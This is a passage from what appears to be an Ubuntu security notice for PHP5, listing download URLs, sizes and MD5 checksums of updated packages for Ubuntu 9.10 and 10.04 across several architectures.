http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 12296 70b701f2d0f75240c96a5a8026ffa554\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 2473704 f5a11e13c621f7c4fe08317fab33f2c5\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.10.dfsg.1-2ubuntu6.5.diff.gz\r\n Size/MD5: 974073 9f9f08188134ec36c758f2a07dce527e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.10.dfsg.1-2ubuntu6.5.dsc\r\n Size/MD5: 2530 5f87dfc90a7d2ac796af680a452f18fe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.10.dfsg.1.orig.tar.gz\r\n Size/MD5: 11418363 4708aa3cbd1c50411634482e26525344\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.2.10.dfsg.1-2ubuntu6.5_all.deb\r\n Size/MD5: 329210 3b6f3f54d0b95d722e578fb5bb51af35\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.10.dfsg.1-2ubuntu6.5_all.deb\r\n Size/MD5: 1118 ccb143bd8273727f551485e99978f403\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 2643426 4b2242790febbe2086c61bed5e86a956\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 5149512 23162b47eb1d4008fdbb82b4c374396d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 2596740 f47b7e31229a7f7f0804e9a1172ebb4c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 427728 582a903e999a156431221a6f8d4dd960\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 25496 6d229ce6aaa1151a1ca8424852ea28ef\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 8309664 6d363ecff3a7468bd985956eef7f7726\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 366970 c6f7873fd6a0eda7f3149ddc2968b2a1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 37546 7f10370bc828645d21a0b58bfa654a60\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 16384 bdc69e29f0f9e857b32b7a0a18b2cec9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 20654 4b76a7c1da3b36512ef082b3f184c989\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 5690 906b287261aba45f3daed74428672dfa\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 75056 fe5cfaf3f0869561a06d58dd0700baee\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 39228 b35805cbafc25e5cc92ccca9cc610dde\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 58558 b41d7cd275daefef2fc55b8a66f99a9c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 10088 c0c761d5d84b3c94d6b3598897227b33\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 5190 6c0f5f5d4c8f1e86731ca429d7444a4c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 13146 515e6e31bb3aea00ed93167008660c3a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 39934 748c64b5ce252ee352a245230cf0c111\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 29220 c108af415bab8084da0725fc9b9940ee\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 18210 795a2f605ceea921875de1fbc2b15c3e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 39366 ca28e8a92f24e00bb9e7f752467bf215\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 14052 f3d5881dca496462ffc49c369f556ca6\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.2.10.dfsg.1-2ubuntu6.5_amd64.deb\r\n Size/MD5: 2642056 f2156c6b59772db05544df2a6997d7ad\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 2503978 c9f7138152459ed5ba9a9dc0daab4e70\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 4979674 0e67a1dc4722c4ae337047dbb3b11478\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 2511360 ec7c2e90bc1fb1a64af9ef6c5e9af7ef\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 424604 1c82565b6a52113994675b7b14b3446b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 24022 24efd145b766c6df32417751f9b6e2ba\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 8507310 9482546a7fe77c879d7ee2c74680fc63\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 366980 baecb86ec494013ba1d65c67cd0c92c7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 33136 436f3c649d523a6bd97e652bc2e2d53d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 14210 7e05c037c8a5aa152faac27c86c37108\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 18770 7d8742436ba12acaac78d12b7460b99a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 5374 2c6eb5ab919d58949da5170a263974dd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 66152 ffc4f8c8abed1e541af9f0a5f612cdf1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 35806 adf794fdf13355e16f2713e8c9072f66\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 53860 e38b71b36cd50351c3a680531df29ad9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 9190 0df8e2dc346b461bb26319b2d1fdf706\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 4954 f894e5f44554a310f0e4c91c249e1f5b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 12074 3e5cbe0f6b0c391c0d63bcca02a5e5c3\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 35124 2bac4b1c53e4f957c946a57ea3b546b1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 26658 fdb58adb1c59cbd7e628a0ad6862674e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 16592 f44ad4e0bd457840fa25c985112e7943\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 36520 25d23ca89854f378efcef8fe75f9b9b9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 12920 adc656e34b9e943ef0ebbd10db8d4de2\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.2.10.dfsg.1-2ubuntu6.5_i386.deb\r\n Size/MD5: 2502890 3a3dc2f90f757d8f69f39779cef97891\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 2492610 e7461e869d0cbb8b934826b6290aa3d4\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 4956284 c47dc195640cf5a4261c727d12240414\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 2497840 f6853624340c2e431f18cac7737e7dd6\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 424372 19e07955e8052a078ddb221df26237f1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 23640 2cdf12b453b562cb55a0e995ffb4361b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 8608090 bca3dd706dbc7dc2e858db731c8bd55a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 366980 4336c98530ea3dc249ff658bf0141777\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 32656 a214e8e0ced9d917e68eb917b82dfaa8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 14154 4d20b247b8d7e0f3fd8e60fc4e94bce3\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 18598 b7598d36cd745f4f19970cd319c2fe90\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 5258 0472058254099cee54d7e3b73f69d436\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 64882 a676e052ad49ec12e892251ed34bd8f5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 35472 e4042c0f972cdf1fa8d1e31ad852e53d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 53526 bb2b0588faaac2444ebdffee7c891bef\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 9094 b8319ec691b881b9e63891dc21b1a493\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 4900 123140974aecd2b349067227498da608\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 11950 b38fbf02b3474ba73e51bb82e7350a8a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 34622 716ad21b7e17dc9841143b368113ad82\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 26604 ee0907feb5b0609a1d1b18d362956878\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 16698 013343ad534a28921952949e153382a1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 36262 45ae202bd6d98f8bdbd5a34114ec15d9\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 12916 dabc4228c16c27fa55f858c61a9f1c4f\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.10.dfsg.1-2ubuntu6.5_lpia.deb\r\n Size/MD5: 2491478 dcb23f9a99b3a80a68f74d48613ec880\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 2636228 72b5ba85045c4e5657ae7eb2d299910e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 5119258 d4c50d6b851de5bd3d5f9cce37412695\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 2584850 336615b6fc04a35d9c6f9b2242db1d0e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 430288 92c0c7bb25e6a8a378b29e5cc21c4856\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 26358 d9abef784eb95caffbb156e88b733237\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 8974348 b4dabf8118330a594ffee0c2d05ea34d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 367020 4c10145cb4fc6d2f6ea5975480cf0379\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 36680 da367ab076ec44d97ba6b3d96444abde\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 14736 8e6e36e2a61907acd007199e8d0ba23e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 20024 54b133226ea1c49ca351719e5f2c408c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 5644 7c8f5557e56a69f569847ee8c69fe79e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 70052 56fe4e4d4ec3ab60faccf18528307f5d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 36884 cc642b6953a338406374cf7a87fed1a6\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 56888 cd7fd3602033236c6ba038f9ed713152\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 9346 375bde5630b195359aed842fd54545db\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 5208 f6511386373c30f3b854054bb41abe29\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 12406 291932552c5fc8230afd9f9f6765a5f8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 37674 c7a194f947a45f73bb988364dee42b4b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 27492 b224203bddec3a9eb7ec8bd759c77356\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 17978 af834173a1fe794778e738ccf32aa21b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 38498 6e4ed7dfc2ac3e3bf1c2545d04631ed8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 13888 ca90d29948ec2563b24c24d3a457a8ff\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.10.dfsg.1-2ubuntu6.5_powerpc.deb\r\n Size/MD5: 2635740 ece48cbd64b854784d13c0f46d9b6a17\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 2493918 6134f9d30cc54202803cec4cbd09b089\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 4884740 9ee77e28f22302996c9bc0d499b16ee8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 2461434 b0592abeb7163d5563f2f11b36acc180\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 426708 d4d8482727581c3db16617a7f91315d6\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 24558 1c4743a993cce53736de01ad77221b5c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 8364802 9536a211a4e9f84f1ca9831c8aebb248\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 367006 5a35dc140710a454cceee1c45924d6b6\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 33102 619dc9f75d423425032e6b7e1a01b37f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 13328 9e98ed23927a3a8e34caba948fe1e629\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 17918 6d655f547456d39027eb36ed76bd2306\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 5182 a2594f1f8a4f434a4c9d11ee339bb821\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 62936 93c4aa26cabd75d81fa0909c59acfd7b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 33388 b5bcfa2559b467a4aabe6982ae9e2d95\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 50238 936fd084a37bd4ff6cbb5ffdd65fb6a0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 8624 4a0c4b79000a3c2a81629548ec6714ba\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 4838 da0ddd7f1b1331bc535f637d5755428d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 11978 2fda121576ea99b10d3b8db75f6dba5c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 32614 4604ad783d42311d027014e46bab7419\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 24980 857c67ca2718ebad409b82da72b6a642\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 16586 c3408d7a01e71ca520a016fd981102e8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 34984 82e9a29752fe18f116e158609a3e910c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 12372 ff28e25e311babf6a5995fc1acbc2a08\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 2492420 9c3d3e00f0d3235b7e8fea7445a8b4ff\r\n\r\nUpdated packages for Ubuntu 10.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2-1ubuntu4.5.diff.gz\r\n Size/MD5: 189362 aa33a5f769d54a8d301fc095023fe422\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2-1ubuntu4.5.dsc\r\n Size/MD5: 2531 465758af781eb956c70a009c69570ac2\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2.orig.tar.gz\r\n Size/MD5: 13734462 4480d7c6d6b4a86de7b8ec8f0c2d1871\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.3.2-1ubuntu4.5_all.deb\r\n Size/MD5: 354420 6ffdc0887531e0cae847a9f601052846\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2-1ubuntu4.5_all.deb\r\n Size/MD5: 1116 b976b1037c96f85f0c2f812978f0781f\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 2987902 87c10d63cefc3b2cd09afb19c4f9a908\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 5804282 d4526a24a661b4b12ae21af04d1ef521\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 2904756 54acd4f66099c0d98f4fcce53bef5c19\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 547646 cb958af661aefe3d2c40b24b2b3a3726\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 27064 3ddc8320466bf1e590c5421e5b2e3e8f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 10381704 455b2decca8184e3fcf0ab677c03bf32\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 404854 83d7f22822fa11584b1b49b1c4e98de2\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 39006 d7bd335e611856cd54fb31fc67a77a36\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 16494 8e3deb0c5de50492842c14ab5be234cf\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 19904 af5cd748fb0b432af5e2136a2fe55731\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 73024 470c7b73e256fd700905007c0d403f56\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 35846 8bf763a2b1f09f2af8435ba23642899c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 57258 33e8ecdcdb80dd868bba0dc65335e8ec\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 8176 9ead5cc3fe69e08a0328ad95dde69dd0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 4380 670b536c8d450bee99725e99d9443251\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 11382 998ed2e50fff0e7aabf1af8afd71e82c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 55294 a04244cd17c268b6402ea7b6c1cb6ddd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 26572 58f6ee9aca91446ac62f7326f099001c\r\n 